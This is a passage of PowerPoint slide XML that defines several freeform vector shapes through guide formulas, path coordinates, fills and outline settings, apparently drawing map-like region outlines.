                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="89"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36433" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3294" y="2360"/>
                <a:ext cx="24" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 24"/>
                  <a:gd name="T1" fmla="*/ 1 h 31"/>
                  <a:gd name="T2" fmla="*/ 17 w 24"/>
                  <a:gd name="T3" fmla="*/ 1 h 31"/>
                  <a:gd name="T4" fmla="*/ 19 w 24"/>
                  <a:gd name="T5" fmla="*/ 1 h 31"/>
                  <a:gd name="T6" fmla="*/ 20 w 24"/>
                  <a:gd name="T7" fmla="*/ 0 h 31"/>
                  <a:gd name="T8" fmla="*/ 20 w 24"/>
                  <a:gd name="T9" fmla="*/ 1 h 31"/>
                  <a:gd name="T10" fmla="*/ 21 w 24"/>
                  <a:gd name="T11" fmla="*/ 2 h 31"/>
                  <a:gd name="T12" fmla="*/ 20 w 24"/>
                  <a:gd name="T13" fmla="*/ 3 h 31"/>
                  <a:gd name="T14" fmla="*/ 21 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 31"/>
                  <a:gd name="T16" fmla="*/ 23 w 24"/>
                  <a:gd name="T17" fmla="*/ 5 h 31"/>
                  <a:gd name="T18" fmla="*/ 23 w 24"/>
                  <a:gd name="T19" fmla="*/ 7 h 31"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 8 h 31"/>
                  <a:gd name="T22" fmla="*/ 24 w 24"/>
                  <a:gd name="T23" fmla="*/ 9 h 31"/>
                  <a:gd name="T24" fmla="*/ 24 w 24"/>
                  <a:gd name="T25" fmla="*/ 9 h 31"/>
                  <a:gd name="T26" fmla="*/ 22 w 24"/>
                  <a:gd name="T27" fmla="*/ 12 h 31"/>
                  <a:gd name="T28" fmla="*/ 21 w 24"/>
                  <a:gd name="T29" fmla="*/ 13 h 31"/>
                  <a:gd name="T30" fmla="*/ 20 w 24"/>
                  <a:gd name="T31" fmla="*/ 14 h 31"/>
                  <a:gd name="T32" fmla="*/ 19 w 24"/>
                  <a:gd name="T33" fmla="*/ 15 h 31"/>
                  <a:gd name="T34" fmla="*/ 19 w 24"/>
                  <a:gd name="T35" fmla="*/ 15 h 31"/>
                  <a:gd name="T36" fmla="*/ 20 w 24"/>
                  <a:gd name="T37" fmla="*/ 17 h 31"/>
                  <a:gd name="T38" fmla="*/ 16 w 24"/>
                  <a:gd name="T39" fmla="*/ 17 h 31"/>
                  <a:gd name="T40" fmla="*/ 14 w 24"/>
                  <a:gd name="T41" fmla="*/ 19 h 31"/>
                  <a:gd name="T42" fmla="*/ 13 w 24"/>
                  <a:gd name="T43" fmla="*/ 20 h 31"/>
                  <a:gd name="T44" fmla="*/ 15 w 24"/>
                  <a:gd name="T45" fmla="*/ 21 h 31"/>
                  <a:gd name="T46" fmla="*/ 15 w 24"/>
                  <a:gd name="T47" fmla="*/ 21 h 31"/>
                  <a:gd name="T48" fmla="*/ 12 w 24"/>
                  <a:gd name="T49" fmla="*/ 25 h 31"/>
                  <a:gd name="T50" fmla="*/ 11 w 24"/>
                  <a:gd name="T51" fmla="*/ 26 h 31"/>
                  <a:gd name="T52" fmla="*/ 8 w 24"/>
                  <a:gd name="T53" fmla="*/ 27 h 31"/>
                  <a:gd name="T54" fmla="*/ 8 w 24"/>
                  <a:gd name="T55" fmla="*/ 27 h 31"/>
                  <a:gd name="T56" fmla="*/ 7 w 24"/>
                  <a:gd name="T57" fmla="*/ 27 h 31"/>
                  <a:gd name="T58" fmla="*/ 7 w 24"/>
                  <a:gd name="T59" fmla="*/ 29 h 31"/>
                  <a:gd name="T60" fmla="*/ 7 w 24"/>
                  <a:gd name="T61" fmla="*/ 31 h 31"/>
                  <a:gd name="T62" fmla="*/ 4 w 24"/>
                  <a:gd name="T63" fmla="*/ 31 h 31"/>
                  <a:gd name="T64" fmla="*/ 4 w 24"/>
                  <a:gd name="T65" fmla="*/ 30 h 31"/>
                  <a:gd name="T66" fmla="*/ 3 w 24"/>
                  <a:gd name="T67" fmla="*/ 30 h 31"/>
                  <a:gd name="T68" fmla="*/ 0 w 24"/>
                  <a:gd name="T69" fmla="*/ 31 h 31"/>
                  <a:gd name="T70" fmla="*/ 2 w 24"/>
                  <a:gd name="T71" fmla="*/ 28 h 31"/>
                  <a:gd name="T72" fmla="*/ 3 w 24"/>
                  <a:gd name="T73" fmla="*/ 25 h 31"/>
                  <a:gd name="T74" fmla="*/ 4 w 24"/>
                  <a:gd name="T75" fmla="*/ 23 h 31"/>
                  <a:gd name="T76" fmla="*/ 6 w 24"/>
                  <a:gd name="T77" fmla="*/ 17 h 31"/>
                  <a:gd name="T78" fmla="*/ 6 w 24"/>
                  <a:gd name="T79" fmla="*/ 15 h 31"/>
                  <a:gd name="T80" fmla="*/ 7 w 24"/>
                  <a:gd name="T81" fmla="*/ 15 h 31"/>
                  <a:gd name="T82" fmla="*/ 8 w 24"/>
                  <a:gd name="T83" fmla="*/ 14 h 31"/>
                  <a:gd name="T84" fmla="*/ 9 w 24"/>
                  <a:gd name="T85" fmla="*/ 11 h 31"/>
                  <a:gd name="T86" fmla="*/ 9 w 24"/>
                  <a:gd name="T87" fmla="*/ 8 h 31"/>
                  <a:gd name="T88" fmla="*/ 12 w 24"/>
                  <a:gd name="T89" fmla="*/ 4 h 31"/>
                  <a:gd name="T90" fmla="*/ 13 w 24"/>
                  <a:gd name="T91" fmla="*/ 4 h 31"/>
                  <a:gd name="T92" fmla="*/ 14 w 24"/>
                  <a:gd name="T93" fmla="*/ 2 h 31"/>
                  <a:gd name="T94" fmla="*/ 14 w 24"/>
                  <a:gd name="T95" fmla="*/ 1 h 31"/>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4"/>
                  <a:gd name="T145" fmla="*/ 0 h 31"/>
                  <a:gd name="T146" fmla="*/ 24 w 24"/>
                  <a:gd name="T147" fmla="*/ 31 h 31"/>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4" h="31">
                    <a:moveTo>
                      <a:pt x="14" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36434" name="Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3294" y="2360"/>
                <a:ext cx="24" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 24"/>
                  <a:gd name="T1" fmla="*/ 1 h 31"/>
                  <a:gd name="T2" fmla="*/ 17 w 24"/>
                  <a:gd name="T3" fmla="*/ 1 h 31"/>
                  <a:gd name="T4" fmla="*/ 19 w 24"/>
                  <a:gd name="T5" fmla="*/ 1 h 31"/>
                  <a:gd name="T6" fmla="*/ 20 w 24"/>
                  <a:gd name="T7" fmla="*/ 0 h 31"/>
                  <a:gd name="T8" fmla="*/ 20 w 24"/>
                  <a:gd name="T9" fmla="*/ 1 h 31"/>
                  <a:gd name="T10" fmla="*/ 21 w 24"/>
                  <a:gd name="T11" fmla="*/ 2 h 31"/>
                  <a:gd name="T12" fmla="*/ 20 w 24"/>
                  <a:gd name="T13" fmla="*/ 3 h 31"/>
                  <a:gd name="T14" fmla="*/ 21 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 31"/>
                  <a:gd name="T16" fmla="*/ 23 w 24"/>
                  <a:gd name="T17" fmla="*/ 5 h 31"/>
                  <a:gd name="T18" fmla="*/ 23 w 24"/>
                  <a:gd name="T19" fmla="*/ 7 h 31"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 8 h 31"/>
                  <a:gd name="T22" fmla="*/ 24 w 24"/>
                  <a:gd name="T23" fmla="*/ 9 h 31"/>
                  <a:gd name="T24" fmla="*/ 24 w 24"/>
                  <a:gd name="T25" fmla="*/ 9 h 31"/>
                  <a:gd name="T26" fmla="*/ 22 w 24"/>
                  <a:gd name="T27" fmla="*/ 12 h 31"/>
                  <a:gd name="T28" fmla="*/ 21 w 24"/>
                  <a:gd name="T29" fmla="*/ 13 h 31"/>
                  <a:gd name="T30" fmla="*/ 20 w 24"/>
                  <a:gd name="T31" fmla="*/ 14 h 31"/>
                  <a:gd name="T32" fmla="*/ 19 w 24"/>
                  <a:gd name="T33" fmla="*/ 15 h 31"/>
                  <a:gd name="T34" fmla="*/ 19 w 24"/>
                  <a:gd name="T35" fmla="*/ 15 h 31"/>
                  <a:gd name="T36" fmla="*/ 20 w 24"/>
                  <a:gd name="T37" fmla="*/ 17 h 31"/>
                  <a:gd name="T38" fmla="*/ 16 w 24"/>
                  <a:gd name="T39" fmla="*/ 17 h 31"/>
                  <a:gd name="T40" fmla="*/ 14 w 24"/>
                  <a:gd name="T41" fmla="*/ 19 h 31"/>
                  <a:gd name="T42" fmla="*/ 13 w 24"/>
                  <a:gd name="T43" fmla="*/ 20 h 31"/>
                  <a:gd name="T44" fmla="*/ 15 w 24"/>
                  <a:gd name="T45" fmla="*/ 21 h 31"/>
                  <a:gd name="T46" fmla="*/ 15 w 24"/>
                  <a:gd name="T47" fmla="*/ 21 h 31"/>
                  <a:gd name="T48" fmla="*/ 12 w 24"/>
                  <a:gd name="T49" fmla="*/ 25 h 31"/>
                  <a:gd name="T50" fmla="*/ 11 w 24"/>
                  <a:gd name="T51" fmla="*/ 26 h 31"/>
                  <a:gd name="T52" fmla="*/ 8 w 24"/>
                  <a:gd name="T53" fmla="*/ 27 h 31"/>
                  <a:gd name="T54" fmla="*/ 8 w 24"/>
                  <a:gd name="T55" fmla="*/ 27 h 31"/>
                  <a:gd name="T56" fmla="*/ 7 w 24"/>
                  <a:gd name="T57" fmla="*/ 27 h 31"/>
                  <a:gd name="T58" fmla="*/ 7 w 24"/>
                  <a:gd name="T59" fmla="*/ 29 h 31"/>
                  <a:gd name="T60" fmla="*/ 7 w 24"/>
                  <a:gd name="T61" fmla="*/ 31 h 31"/>
                  <a:gd name="T62" fmla="*/ 4 w 24"/>
                  <a:gd name="T63" fmla="*/ 31 h 31"/>
                  <a:gd name="T64" fmla="*/ 4 w 24"/>
                  <a:gd name="T65" fmla="*/ 30 h 31"/>
                  <a:gd name="T66" fmla="*/ 3 w 24"/>
                  <a:gd name="T67" fmla="*/ 30 h 31"/>
                  <a:gd name="T68" fmla="*/ 0 w 24"/>
                  <a:gd name="T69" fmla="*/ 31 h 31"/>
                  <a:gd name="T70" fmla="*/ 2 w 24"/>
                  <a:gd name="T71" fmla="*/ 28 h 31"/>
                  <a:gd name="T72" fmla="*/ 3 w 24"/>
                  <a:gd name="T73" fmla="*/ 25 h 31"/>
                  <a:gd name="T74" fmla="*/ 4 w 24"/>
                  <a:gd name="T75" fmla="*/ 23 h 31"/>
                  <a:gd name="T76" fmla="*/ 6 w 24"/>
                  <a:gd name="T77" fmla="*/ 17 h 31"/>
                  <a:gd name="T78" fmla="*/ 6 w 24"/>
                  <a:gd name="T79" fmla="*/ 15 h 31"/>
                  <a:gd name="T80" fmla="*/ 7 w 24"/>
                  <a:gd name="T81" fmla="*/ 15 h 31"/>
                  <a:gd name="T82" fmla="*/ 8 w 24"/>
                  <a:gd name="T83" fmla="*/ 14 h 31"/>
                  <a:gd name="T84" fmla="*/ 9 w 24"/>
                  <a:gd name="T85" fmla="*/ 11 h 31"/>
                  <a:gd name="T86" fmla="*/ 9 w 24"/>
                  <a:gd name="T87" fmla="*/ 8 h 31"/>
                  <a:gd name="T88" fmla="*/ 12 w 24"/>
                  <a:gd name="T89" fmla="*/ 4 h 31"/>
                  <a:gd name="T90" fmla="*/ 13 w 24"/>
                  <a:gd name="T91" fmla="*/ 4 h 31"/>
                  <a:gd name="T92" fmla="*/ 14 w 24"/>
                  <a:gd name="T93" fmla="*/ 2 h 31"/>
                  <a:gd name="T94" fmla="*/ 14 w 24"/>
                  <a:gd name="T95" fmla="*/ 1 h 31"/>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4"/>
                  <a:gd name="T145" fmla="*/ 0 h 31"/>
                  <a:gd name="T146" fmla="*/ 24 w 24"/>
                  <a:gd name="T147" fmla="*/ 31 h 31"/>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4" h="31">
                    <a:moveTo>
                      <a:pt x="14" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36435" name="Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3375" y="2175"/>
                <a:ext cx="107" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 107"/>
                  <a:gd name="T1" fmla="*/ 2 h 54"/>
                  <a:gd name="T2" fmla="*/ 5 w 107"/>
                  <a:gd name="T3" fmla="*/ 0 h 54"/>
                  <a:gd name="T4" fmla="*/ 8 w 107"/>
                  <a:gd name="T5" fmla="*/ 1 h 54"/>
                  <a:gd name="T6" fmla="*/ 13 w 107"/>
                  <a:gd name="T7" fmla="*/ 2 h 54"/>
                  <a:gd name="T8" fmla="*/ 17 w 107"/>
                  <a:gd name="T9" fmla="*/ 5 h 54"/>
                  <a:gd name="T10" fmla="*/ 21 w 107"/>
                  <a:gd name="T11" fmla="*/ 5 h 54"/>
                  <a:gd name="T12" fmla="*/ 24 w 107"/>
                  <a:gd name="T13" fmla="*/ 7 h 54"/>
                  <a:gd name="T14" fmla="*/ 28 w 107"/>
                  <a:gd name="T15" fmla="*/ 8 h 54"/>
                  <a:gd name="T16" fmla="*/ 33 w 107"/>
                  <a:gd name="T17" fmla="*/ 9 h 54"/>
                  <a:gd name="T18" fmla="*/ 40 w 107"/>
                  <a:gd name="T19" fmla="*/ 8 h 54"/>
                  <a:gd name="T20" fmla="*/ 44 w 107"/>
                  <a:gd name="T21" fmla="*/ 9 h 54"/>
                  <a:gd name="T22" fmla="*/ 48 w 107"/>
                  <a:gd name="T23" fmla="*/ 11 h 54"/>
                  <a:gd name="T24" fmla="*/ 51 w 107"/>
                  <a:gd name="T25" fmla="*/ 14 h 54"/>
                  <a:gd name="T26" fmla="*/ 57 w 107"/>
                  <a:gd name="T27" fmla="*/ 16 h 54"/>
                  <a:gd name="T28" fmla="*/ 61 w 107"/>
                  <a:gd name="T29" fmla="*/ 18 h 54"/>
                  <a:gd name="T30" fmla="*/ 60 w 107"/>
                  <a:gd name="T31" fmla="*/ 21 h 54"/>
                  <a:gd name="T32" fmla="*/ 63 w 107"/>
                  <a:gd name="T33" fmla="*/ 22 h 54"/>
                  <a:gd name="T34" fmla="*/ 67 w 107"/>
                  <a:gd name="T35" fmla="*/ 21 h 54"/>
                  <a:gd name="T36" fmla="*/ 69 w 107"/>
                  <a:gd name="T37" fmla="*/ 19 h 54"/>
                  <a:gd name="T38" fmla="*/ 73 w 107"/>
                  <a:gd name="T39" fmla="*/ 18 h 54"/>
                  <a:gd name="T40" fmla="*/ 76 w 107"/>
                  <a:gd name="T41" fmla="*/ 20 h 54"/>
                  <a:gd name="T42" fmla="*/ 78 w 107"/>
                  <a:gd name="T43" fmla="*/ 18 h 54"/>
                  <a:gd name="T44" fmla="*/ 80 w 107"/>
                  <a:gd name="T45" fmla="*/ 19 h 54"/>
                  <a:gd name="T46" fmla="*/ 83 w 107"/>
                  <a:gd name="T47" fmla="*/ 20 h 54"/>
                  <a:gd name="T48" fmla="*/ 86 w 107"/>
                  <a:gd name="T49" fmla="*/ 23 h 54"/>
                  <a:gd name="T50" fmla="*/ 91 w 107"/>
                  <a:gd name="T51" fmla="*/ 23 h 54"/>
                  <a:gd name="T52" fmla="*/ 91 w 107"/>
                  <a:gd name="T53" fmla="*/ 26 h 54"/>
                  <a:gd name="T54" fmla="*/ 93 w 107"/>
                  <a:gd name="T55" fmla="*/ 32 h 54"/>
                  <a:gd name="T56" fmla="*/ 97 w 107"/>
                  <a:gd name="T57" fmla="*/ 34 h 54"/>
                  <a:gd name="T58" fmla="*/ 100 w 107"/>
                  <a:gd name="T59" fmla="*/ 34 h 54"/>
                  <a:gd name="T60" fmla="*/ 103 w 107"/>
                  <a:gd name="T61" fmla="*/ 37 h 54"/>
                  <a:gd name="T62" fmla="*/ 100 w 107"/>
                  <a:gd name="T63" fmla="*/ 40 h 54"/>
                  <a:gd name="T64" fmla="*/ 100 w 107"/>
                  <a:gd name="T65" fmla="*/ 43 h 54"/>
                  <a:gd name="T66" fmla="*/ 106 w 107"/>
                  <a:gd name="T67" fmla="*/ 48 h 54"/>
                  <a:gd name="T68" fmla="*/ 106 w 107"/>
                  <a:gd name="T69" fmla="*/ 53 h 54"/>
                  <a:gd name="T70" fmla="*/ 103 w 107"/>
                  <a:gd name="T71" fmla="*/ 54 h 54"/>
                  <a:gd name="T72" fmla="*/ 100 w 107"/>
                  <a:gd name="T73" fmla="*/ 52 h 54"/>
                  <a:gd name="T74" fmla="*/ 97 w 107"/>
                  <a:gd name="T75" fmla="*/ 52 h 54"/>
                  <a:gd name="T76" fmla="*/ 91 w 107"/>
                  <a:gd name="T77" fmla="*/ 48 h 54"/>
                  <a:gd name="T78" fmla="*/ 85 w 107"/>
                  <a:gd name="T79" fmla="*/ 46 h 54"/>
                  <a:gd name="T80" fmla="*/ 80 w 107"/>
                  <a:gd name="T81" fmla="*/ 49 h 54"/>
